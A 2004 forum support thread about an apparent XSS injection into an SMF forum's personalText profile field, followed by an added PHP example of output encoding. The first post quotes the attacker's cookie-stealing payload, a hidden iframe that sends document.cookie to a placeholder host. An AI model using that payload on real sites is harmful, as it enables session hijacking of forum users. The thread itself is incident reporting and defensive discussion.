Author Topic: personalText: XSS  (Read 6778 times)

Offline Toomany

  • Semi-Newbie
  • *
  • Posts: 52
  • Gender: Male
  • Hithion a.k.a. Toomany.
    • hithion : homepage
personalText: XSS
« on: December 10, 2004, 02:20:27 AM »
Literally last night on my forum (RC2), some unknown bad person somehow managed to inject malicious JavaScript into the personalText of his profile.
When viewed as HTML, his signature looked roughly like this:
Code:
<script src=script address></script>
The script, in turn, looked like this:
Code:
var a='<iframe src=http://address/?co=' + document.cookie + ' width=0 height=0 style=visibility:hidden></iframe>';document.write(a);
Moreover! In theory, when profile fields are processed, < and > should be replaced with the corresponding literals &lt; and &gt;. And what's more, they were replaced: if I opened this person's profile and re-saved it, the tags were killed, replaced with the literals.

Attention, a question for the experts! :)
HOW did this bad person manage to plant that JavaScript into personalText? :)
Too many shadows, whispering voices,
Faces on posters, too many choices:
If, when, why, what?
How much have you got?
Have you got it, do you get it, if so, how often?
And which do you choose, a hard or soft option?..
How much do you need?..

Offline [Unknown]

  • SMF Friend
  • SMF Master
  • *
  • Posts: 36,102
  • Gender: Male
Re: personalText: XSS
« Reply #1 on: December 10, 2004, 03:39:31 AM »
I can't read Russian, but you can't put any javascript into your personal text, unless you've changed something.

Try putting <b>test</b> in there.  If you're right, your personal text will be bold.

Now, of course, if you have database access you can manually edit the field, and get the effect I assume you describe.  For this reason, we suggest you do not give your users phpMyAdmin or MySQL server access.

If you're saying that someone did this to you, I will need you to send me Apache access logs from the time it happened, if possible.

-[Unknown]
« Last Edit: December 10, 2004, 03:41:43 AM by [Unknown] »

Offline Toomany

  • Semi-Newbie
  • *
  • Posts: 52
  • Gender: Male
  • Hithion a.k.a. Toomany.
    • hithion : homepage
Re: personalText: XSS
« Reply #2 on: December 10, 2004, 03:53:15 AM »
You can't read Russian, I can't write in English... That's cruel fate =(

Briefly:
Someone has successfully embedded malicious javascript into his personal text at my SMF 1.0RC2.
And hell if I know, how it has bypassed a "</>" filtration - I could not reproduce it.

Now personal text is strip_tags()'ed :) before output - for a while.
« Last Edit: December 10, 2004, 03:57:54 AM by Toomany »
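The thread turns on one point: SMF escapes < and > when a profile is saved, so a value that reaches the database by some other route (the direct database edit [Unknown] mentions, or whatever path the attacker actually used) is never escaped, and strip_tags() on output is only a stopgap. The following is an added PHP example, not SMF's code and not anything either poster wrote, showing why encoding at render time catches the payload regardless of how it got into the field, and how it compares with the strip_tags() workaround. The sample values are constructed, modelled on the payload quoted in the first post; the script URL is a placeholder.

```php
<?php
// Added example (not SMF's own code): render a profile field safely on output.
// Input-time escaping (turning < and > into &lt; and &gt; when the profile is
// saved) protects only data that came in through the profile form. A value
// written by any other path skips it, so a second encoding step at render time
// is what actually keeps the browser from treating the field as markup.

// Constructed sample values, modelled on the payload quoted in the thread.
// The script URL is a placeholder, not a real address.
$samples = [
    'plain'   => 'Hithion a.k.a. Toomany.',
    'bold'    => '<b>test</b>',   // the check [Unknown] suggests: bold means unescaped
    'payload' => '<script src=http://example.invalid/x.js></script>',
];

// Correct for the element-content context: every character that could start
// markup becomes an entity, so the browser displays the field as text.
function render_personal_text(string $raw): string
{
    return htmlspecialchars($raw, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// The interim workaround from the thread. It removes whole tags but is not a
// context-aware encoder: it changes legitimate text and still passes through
// the text between tags unchanged.
function render_with_strip_tags(string $raw): string
{
    return strip_tags($raw);
}

// Self-check used below: an encoded field must not contain a raw '<'.
function contains_raw_tag(string $html): bool
{
    return strpos($html, '<') !== false;
}

foreach ($samples as $name => $raw) {
    $safe  = render_personal_text($raw);
    $strip = render_with_strip_tags($raw);
    printf("%-8s htmlspecialchars: %s\n", $name, $safe);
    printf("%-8s strip_tags      : %s\n", $name, $strip);
    // Holds for every sample, including the script payload, whatever its origin.
    assert(!contains_raw_tag($safe));
}
```

Running this prints the encoded form next to the stripped form for each value: the script payload becomes an inert `&lt;script ...&gt;` string under htmlspecialchars(), while strip_tags() silently drops it, which hides the evidence rather than proving the field was escaped on the way in. The `<b>test</b>` sample is the quick test from reply #1: if it renders bold on a live forum, the value bypassed the save-time escaping and output encoding is the layer that is missing.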